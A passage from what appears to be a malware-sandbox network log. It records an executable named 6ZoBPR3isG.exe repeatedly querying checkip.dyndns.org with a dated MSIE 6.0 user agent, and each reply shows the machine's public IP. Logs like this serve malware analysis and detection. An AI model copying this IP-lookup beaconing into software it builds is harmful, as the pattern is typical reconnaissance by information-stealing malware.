                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            16192.168.2.350013132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:08.532440901 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:09.204433918 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:09 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            17192.168.2.350015132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:10.218214035 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:10.861000061 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:10 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            18192.168.2.350017132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:11.713679075 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:12.395607948 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:12 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            19192.168.2.350019132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:13.315646887 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:14.010092974 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:13 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            20192.168.2.350021132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:14.931798935 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:15.622426987 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:15 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            21192.168.2.350023132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:16.569268942 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:17.241962910 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:17 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            22192.168.2.350025132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:18.221340895 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:18.901566982 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:18 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            23192.168.2.350027132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:20.157989025 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:20.920300961 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:20 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            24192.168.2.350029132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:21.908871889 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:22.613194942 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:22 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            25192.168.2.350031132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:23.561160088 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:24.274621964 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:24 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            26192.168.2.350033132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:25.167644024 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:25.873476982 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:25 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            27192.168.2.350035132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:26.832545996 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:27.508225918 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:27 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            28192.168.2.350037132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:28.453649998 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:29.165435076 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:29 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            29192.168.2.350039132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:30.113130093 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:30.789267063 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:30 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            30192.168.2.350041132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:31.751950979 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:32.456656933 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:32 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            31192.168.2.350043132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:33.377614021 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:34.070358038 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:33 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            32192.168.2.350045132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:34.961698055 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:35.641462088 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:35 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            33192.168.2.350047132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:36.645812035 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:37.318486929 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:37 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            34192.168.2.350049132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:38.407104015 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:39.079986095 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:38 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                            Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            35192.168.2.350051132.226.247.73808068C:\Users\user\Desktop\6ZoBPR3isG.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            Jan 10, 2025 22:32:40.018714905 CET151OUTGET / HTTP/1.1
                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                            Host: checkip.dyndns.org
                                                                                                            Connection: Keep-Alive
                                                                                                            Jan 10, 2025 22:32:40.723712921 CET273INHTTP/1.1 200 OK
                                                                                                            Date: Fri, 10 Jan 2025 21:32:40 GMT
                                                                                                            Content-Type: text/html
                                                                                                            Content-Length: 104
                                                                                                            Connection: keep-alive
                                                                                                            Cache-Control: no-cache
                                                                                                            Pragma: no-cache
                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
